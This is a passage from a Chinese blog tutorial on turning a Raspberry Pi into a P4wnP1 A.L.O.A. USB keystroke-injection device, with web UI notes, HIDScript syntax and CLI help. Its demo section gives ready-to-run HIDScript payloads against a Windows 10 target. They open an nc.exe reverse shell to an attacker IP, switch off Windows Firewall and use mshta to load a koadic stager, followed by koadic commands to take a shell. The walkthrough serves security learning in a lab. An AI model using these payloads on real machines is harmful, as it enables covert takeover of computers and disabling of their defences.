<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/36.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191228205921497" class="fancybox"><img alt="image-20191228205921497" title="image-20191228205921497" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/36.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
<li><p><code>Event Log</code></p>
<p>事件日志</p>
</li>
<li><p><code>Generic Settings</code></p>
<p>模板编辑，存放之前编辑的设置，每次开机会套用这里的模板</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/37.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191228211749247" class="fancybox"><img alt="image-20191228211749247" title="image-20191228211749247" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/37.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>如果你想开机加载的<code>WiFi</code>为你设置的<code>WiFi</code>，首先要在<code>WiFi settings</code>模块中上传你的<code>WiFi</code>模板，然后按下图设置后点<code>REBOOT</code>即可，如果你还想做其他开机启动操作都是类似的</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/39.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191229130728384" class="fancybox"><img alt="image-20191229130728384" title="image-20191229130728384" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/39.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
<li><p><code>HIDScrip</code></p>
<p>这个是重点，可以执行高效的攻击命令和来的<code>P4wnP1</code>相比可做的事情多太多了，据官方文档所写的是基于<code>JavaScript</code>的</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/38.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191228211937386" class="fancybox"><img alt="image-20191228211937386" title="image-20191228211937386" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/38.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">javascript</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">layout(<span class="string">'us'</span>);			<span class="comment">// 键盘布局</span></span><br><span class="line">typingSpeed(<span class="number">100</span>,<span class="number">150</span>)	<span class="comment">// 敲击按键的时候等待的间隔100毫秒加上0-150毫秒之间的随机值</span></span><br><span class="line">waitLEDRepeat(NUM);		<span class="comment">//类似于等待用户按下某个键然后在继续运行，但是在OSX上没用</span></span><br><span class="line">press(<span class="string">"GUI r"</span>);<span class="comment">//类似按下某个键位然后再抬起来，具体可以看官方文档，和上面的机制相识</span></span><br><span class="line">delay(<span class="number">500</span>);<span class="comment">//暂停时间</span></span><br><span class="line">type(<span class="string">"notepad\n"</span>)<span class="comment">//输入字符串，模拟键盘按键</span></span><br><span class="line">moveStepped(x,y); <span class="comment">//鼠标移动，相当于模拟正常运动</span></span><br><span class="line">moveTo(x,y); <span class="comment">//鼠标移动到设置的坐标点，x和y分别是横纵坐标，这个相当于跳刀</span></span><br></pre></td></tr></table></figure></div>

<p>下面给出一个<code>demo</code></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">javascript</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//详细操作参考官方文档</span></span><br><span class="line"><span class="comment">//https://github.com/mame82/P4wnP1_aloa</span></span><br><span class="line">layout(<span class="string">'us'</span>);</span><br><span class="line">typingSpeed(<span class="number">500</span>,<span class="number">9102</span>);</span><br><span class="line">waitLEDRepeat(NUM);</span><br><span class="line">press(<span class="string">"GUI R"</span>);</span><br><span class="line">type(<span class="string">"ping www.ascotbe.com"</span>);</span><br><span class="line">delay(<span class="number">100</span>);</span><br><span class="line">press(<span class="string">"SHIFT A"</span>);</span><br></pre></td></tr></table></figure></div>

</li>
</ul>
<blockquote>
<p><code>ssh</code>端</p>
</blockquote>
<p>通过<code>SSH</code>连进去首先修改<code>root</code>密码</p>
<p>首先进去可以对源以及联网进行修改具体方法和上面最开始的换源设置<code>WiFi</code>方式类似</p>
<p><code>P4wnP1</code>的<code>web</code>端的储存文件的位置都在<code>/P4wnP1/dist</code>目录下</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/40.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191229134002524" class="fancybox"><img alt="image-20191229134002524" title="image-20191229134002524" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/40.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p><code>ssh</code>也可以做<code>web</code>的工作，官方根据官方给出的文档输入<code>P4wnP1_cli -h</code>可以查看帮助文档</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">bash</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment"># P4wnP1_cli -h</span></span><br><span class="line">The CLI client tool could be used to configure P4wnP1 A.L.O.A.</span><br><span class="line">from the <span class="built_in">command</span> line. The tool relies on RPC so it could be used </span><br><span class="line">remotely.</span><br><span class="line"></span><br><span class="line">Version: v0.1.0-alpha2</span><br><span class="line"></span><br><span class="line">Usage:</span><br><span class="line">  P4wnP1_cli [<span class="built_in">command</span>]</span><br><span class="line"></span><br><span class="line">Available Commands:</span><br><span class="line">  db          Database backup and restore <span class="comment">#数据库备份和还原</span></span><br><span class="line">  evt         Receive P4wnP1 service events<span class="comment">#接收P4wnP1服务事件</span></span><br><span class="line">  <span class="built_in">help</span>        Help about any <span class="built_in">command</span></span><br><span class="line">  hid         Use keyboard or mouse functionality<span class="comment">#  使用键盘或鼠标功能</span></span><br><span class="line">  led         Set or Get LED state of P4wnP1<span class="comment">#设置树莓派led灯闪烁频率</span></span><br><span class="line">  net         Configure Network settings of ethernet interfaces (including USB ethernet <span class="keyword">if</span> enabled)<span class="comment">#配置以太网接口的网络设置（如果启用，则包括USB以太网）</span></span><br><span class="line">  system      system commands<span class="comment">#系统命令</span></span><br><span class="line">  template    Deploy and list templates<span class="comment">#部署并列出模板</span></span><br><span class="line">  trigger     Fire a group send action or <span class="built_in">wait</span> <span class="keyword">for</span> a group receive trigger<span class="comment">#触发模板之类的</span></span><br><span class="line">  usb         USB gadget settings<span class="comment">#USB小工具设置</span></span><br><span class="line">  wifi        Configure WiFi (spawn Access Point or join WiFi networks)<span class="comment">#配置WiFi（生成接入点或加入WiFi网络）</span></span><br><span class="line"></span><br><span class="line">Flags:</span><br><span class="line">  -h, --<span class="built_in">help</span>          <span class="built_in">help</span> <span class="keyword">for</span> P4wnP1_cli</span><br><span class="line">      --host string   The host with the listening P4wnP1 RPC server (default <span class="string">"localhost"</span>)</span><br><span class="line">      --port string   The port on <span class="built_in">which</span> the P4wnP1 RPC server is listening (default <span class="string">"50051"</span>)</span><br><span class="line"></span><br><span class="line">Use <span class="string">"P4wnP1_cli [command] --help"</span> <span class="keyword">for</span> more information about a <span class="built_in">command</span>.</span><br><span class="line">root@kali:~<span class="comment"># P4wnP1_cli led --help#查看led模块的详细命令</span></span><br><span class="line">Set or Get LED state of P4wnP1</span><br><span class="line"></span><br><span class="line">Usage:</span><br><span class="line">  P4wnP1_cli led [flags]</span><br><span class="line"></span><br><span class="line">Flags:</span><br><span class="line">  -b, --blink uint32   Set blink count (0: Off, 1..254: blink n <span class="built_in">times</span>, &gt;254: On)<span class="comment">#设置为0等于关闭闪烁大于254等于常亮</span></span><br><span class="line">  -h, --<span class="built_in">help</span>           <span class="built_in">help</span> <span class="keyword">for</span> led</span><br><span class="line"></span><br><span class="line">Global Flags:</span><br><span class="line">      --host string   The host with the listening P4wnP1 RPC server (default <span class="string">"localhost"</span>)</span><br><span class="line">      --port string   The port on <span class="built_in">which</span> the P4wnP1 RPC server is listening (default <span class="string">"50051"</span>)</span><br></pre></td></tr></table></figure></div>



<blockquote>
<p>试用体验</p>
</blockquote>
<p>目标机器使用的<code>window 10</code></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/41.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191229150615127" class="fancybox"><img alt="image-20191229150615127" title="image-20191229150615127" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/41.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>攻击机器使用的是<code>Kali</code></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/42.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191229150731975" class="fancybox"><img alt="image-20191229150731975" title="image-20191229150731975" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/42.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>首先把制作好的<code>USB</code>插入电脑中，然后执行命令测试是否正常工作。注意：这边的键盘布局需要和目标机器上的键盘布局一样不然会输出不是你想输出的结果！！！！！</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/43.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191229152142342" class="fancybox"><img alt="image-20191229152142342" title="image-20191229152142342" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/43.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">javascript</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">layout('us');#目标机器上也要设置为美式键盘</span><br><span class="line">typingSpeed(<span class="number">0</span>,<span class="number">0</span>);</span><br><span class="line">press(<span class="string">"GUI R"</span>);</span><br><span class="line">delay(<span class="number">500</span>);</span><br><span class="line">type(<span class="string">"powershell start powershell -A 'ping www.ascotbe.com'\n"</span>);</span><br><span class="line">press(<span class="string">"enter"</span>);</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/44.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191229150421597" class="fancybox"><img alt="image-20191229150421597" title="image-20191229150421597" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/44.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<ul>
<li><p><code>dome1</code>目标机器有<code>nc</code>文件</p>
<ul>
<li><p>攻击机器开启<code>nc</code></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/45.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191229152757930" class="fancybox"><img alt="image-20191229152757930" title="image-20191229152757930" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/45.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
<li><p>然后在<code>web</code>端执行如下<code>demo</code></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">javascript</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">layout(<span class="string">'us'</span>);</span><br><span class="line">typingSpeed(<span class="number">0</span>,<span class="number">0</span>);</span><br><span class="line">press(<span class="string">"GUI R"</span>);</span><br><span class="line">delay(<span class="number">500</span>);</span><br><span class="line">type(<span class="string">"powershell start powershell -A 'C:\\Users\\Administrator\\Desktop\\nc.exe -e cmd.exe -d 192.168.183.138 1024'\n"</span>);</span><br><span class="line">press(<span class="string">"enter"</span>);</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/46.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191229154238872" class="fancybox"><img alt="image-20191229154238872" title="image-20191229154238872" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/46.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
</ul>
</li>
<li><p><code>demo2</code>利用<code>koadic</code>脚本实现反弹</p>
<ul>
<li><p>在攻击机器上搭个类似<code>nc</code>的服务,目标机器只需要访问<code>mshta http://192.168.183.138:9999/h861m</code></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">bash</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> LHOST 192.168.183.138</span><br><span class="line"><span class="built_in">set</span> LPORT 9999</span><br></pre></td></tr></table></figure></div>

</li>
</ul>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/47.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191229155130249" class="fancybox"><img alt="image-20191229155130249" title="image-20191229155130249" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/47.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<ul>
<li><p>树莓派<code>web</code>端运行</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">bash</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">layout(<span class="string">'us'</span>);</span><br><span class="line">typingSpeed(0,0);</span><br><span class="line">press(<span class="string">"GUI R"</span>);</span><br><span class="line">delay(500);</span><br><span class="line"><span class="built_in">type</span>(<span class="string">"powershell start powershell -A 'Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False'\n"</span>);<span class="comment">#关闭windows防火墙</span></span><br><span class="line">delay(1000);</span><br><span class="line">press(<span class="string">"GUI R"</span>);</span><br><span class="line"><span class="built_in">type</span>(<span class="string">"powershell start powershell -A 'mshta http://192.168.183.138:9999/h861m'\n"</span>);</span><br><span class="line">press(<span class="string">"enter"</span>);</span><br></pre></td></tr></table></figure></div>
</li>
<li><p>有回显后执行<code>zombies 0</code>来查看目标机器的详细信息。注意：后面的<code>0</code>代表的是你控制目标机器的<code>ID</code>如果要查看本机直接输入<code>zombies</code>即可</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/48.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191229163105655" class="fancybox"><img alt="image-20191229163105655" title="image-20191229163105655" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/48.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
<li><p>输入<code>cmdshell 0</code>来获取目标机器的<code>shell</code></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/49.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20191229163540305" class="fancybox"><img alt="image-20191229163540305" title="image-20191229163540305" data-src="https://github.com/Ascotbe/Random-img/blob/master/RaspberryPie/49.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
</li>
</ul>
</li>
</ul>
<blockquote>
<p>在手机上测试</p>
</blockquote>
<ul>
<li>苹果：<code>Termius</code></li>
<li>安卓：<code>JuiceSSH</code></li>
</ul>
<blockquote>
<p>参考文章</p>
</blockquote>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;www.jianshu.com&#x2F;p&#x2F;4568f4f0a106</span><br><span class="line">https:&#x2F;&#x2F;github.com&#x2F;zerosum0x0&#x2F;koadic</span><br><span class="line">https:&#x2F;&#x2F;github.com&#x2F;mame82&#x2F;P4wnP1_aloa</span><br><span class="line">https:&#x2F;&#x2F;blog.csdn.net&#x2F;chentuo2000&#x2F;article&#x2F;details&#x2F;81051308</span><br><span class="line">https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v&#x3D;-QrfCNUxKgE</span><br><span class="line">https:&#x2F;&#x2F;zhuanlan.zhihu.com&#x2F;p&#x2F;37359466</span><br></pre></td></tr></table></figure></div>

<p><strong>2019.12.20重构文章</strong></p>
<p><strong>2019.12.28文章添加中添加<code>P4wnP1 A.L.O.A.</code></strong></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Asc0t6e</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://www.ascotbe.com/2019/06/29/raspberry/">https://www.ascotbe.com/2019/06/29/raspberry/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://www.ascotbe.com">Asc0t6e</a>！</span></div></div><div class="tag_share"><div class="post_share"><div class="social-share" data-image="https://gitee.com/asc0t6e/Random-img/raw/master/BlogCover/35.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-button button--primary button--animated"> <i class="fa fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="lazyload post-qr-code__img" src="/img/wechat.jpg" alt="微信"><div class="post-qr-code__desc">微信</div></li><li class="reward-item"><img class="lazyload post-qr-code__img" src="/img/alipay.jpg" alt="支付寶"><div class="post-qr-code__desc">支付寶</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="prev-post pull_left"><a href="/2019/06/29/SQL%20Sever%E5%92%8CMysql%E7%9A%84%E5%8C%BA%E5%88%AB/"><img class="prev_cover lazyload" data-src="https://gitee.com/asc0t6e/Random-img/raw/master/BlogCover/10.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">上一篇</div><div class="prev_info"><span>SQL Sever和Mysql的区别</span></div></a></div><div class="next-post pull_right"><a href="/2019/06/07/Metasploit%E8%AF%A6%E8%A7%A3/"><img class="next_cover lazyload" data-src="https://gitee.com/asc0t6e/Random-img/raw/master/BlogCover/27.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">下一篇</div><div class="next_info"><span>Metasploit详解</span></div></a></div></nav></div></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">&copy;2017 - 2020 By Asc0t6e</div><span>呐呐呐ฅ(๑*д*๑)ฅ到底啦~</span><div class="icp"><a href="http://www.beian.miit.gov.cn/state/outPortal/loginPortal.action" target="_blank" rel="noopener"><img class="icp-icon" src="/img/icp.png"><span>闽ICP备20002178号-1</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="阅读模式"></i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换" target="_self">繁</a><i class="darkmode fa fa-moon-o" id="darkmode" title="夜间模式"></i></div><div id="rightside-config-show"><div id="rightside_config" title="设置"><i class="fa fa-cog" aria-hidden="true"></i></div><i class="fa fa-list-ul close" id="mobile-toc-button" title="目录" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到顶部" aria-hidden="true"></i></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/gh/jerryc127/butterfly_cdn@2.1.0/js/fireworks.js"></script><script id="ribbon_piao" mobile="false" src="https://cdn.jsdelivr.net/gh/jerryc127/butterfly_cdn@2.1.0/js/piao.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@latest/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lazysizes@latest/lazysizes.min.js" async=""></script><script src="https://cdn.jsdelivr.net/gh/jerryc127/butterfly_cdn@2.1.0/js/click_heart.js"></script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/Bronya.model.json"},"display":{"position":"right","width":400,"height":500,"hOffset":-110,"vOffset":-40},"mobile":{"show":false},"log":false});</script></body></html>